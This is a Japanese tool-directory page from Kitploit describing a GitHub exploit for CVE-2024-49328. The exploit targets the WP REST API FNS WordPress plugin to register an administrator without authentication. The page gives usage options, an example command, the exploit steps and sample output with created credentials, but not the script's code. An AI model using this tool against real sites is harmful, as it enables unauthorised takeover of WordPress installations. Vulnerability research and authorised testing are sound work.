Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-49328-exploit — WP REST API FNS WordPress プラグインの権限昇格の脆弱性を悪用し、認証なしで管理者アカウントを作成できるようにするPythonスクリプト。 | Kitploit
ツール/GitHubGitHub/nxploited/cve-2024-49328-exploit
特権昇格脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストレッドチーミング
GitHubnxploited/cve-2024-49328-exploit

CVE-2024-49328-exploit

WP REST API FNS WordPress プラグインの権限昇格の脆弱性を悪用し、認証なしで管理者アカウントを作成できるようにするPythonスクリプト。

リポジトリを見る
1年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2024-49328-exploit

🌟 説明:

このスクリプトは、WordPress 用 WP REST API FNS プラグインの権限昇格の脆弱性を悪用します。この脆弱性は 1.0.0 までの全バージョンに影響し、認証されていない攻撃者が管理者権限を取得できるようにします。

⚙️ 使い方

root@kitploit:~


options:
  -h, --help            show this help message and exit
  -u URL, --url URL     Base URL of the WordPress site
  -e NEWEMAIL, --Newemail NEWEMAIL New email to register
  -p PASSWORD, --password PASSWORD Password for the new user
                        

コマンド例:

root@kitploit:~
python CVE-2024-49328.py -u http://targetsite.com -e [email protected] -p password123

🔍 悪用の詳細

ステップ説明アイコン
ステップ 1プラグインのバージョンを確認します。📝
ステップ 2バージョンが悪用可能かどうかを確認します(1.0.0 以下)。✅
ステップ 3脆弱性を悪用して新しい管理者ユーザーを登録します。🔒
ステップ 4確認用にユーザー資格情報とともに結果を出力します。🎉

➡️ 出力例

root@kitploit:~

Found Stable tag version: 1.0.0
Version 1.0.0 is exploitable.
Exploiting the site... Please wait.
Successfully
Username: [email protected]
Password: nxploit

必要なパッケージをインストール

root@kitploit:~
pip install requests

⚠️ 免責事項

🚨 警告:

このスクリプトは教育目的のみで提供されています。明示的な許可なくシステムに対してこのスクリプトを使用することは、違法かつ非倫理的です。

ツールをダウンロード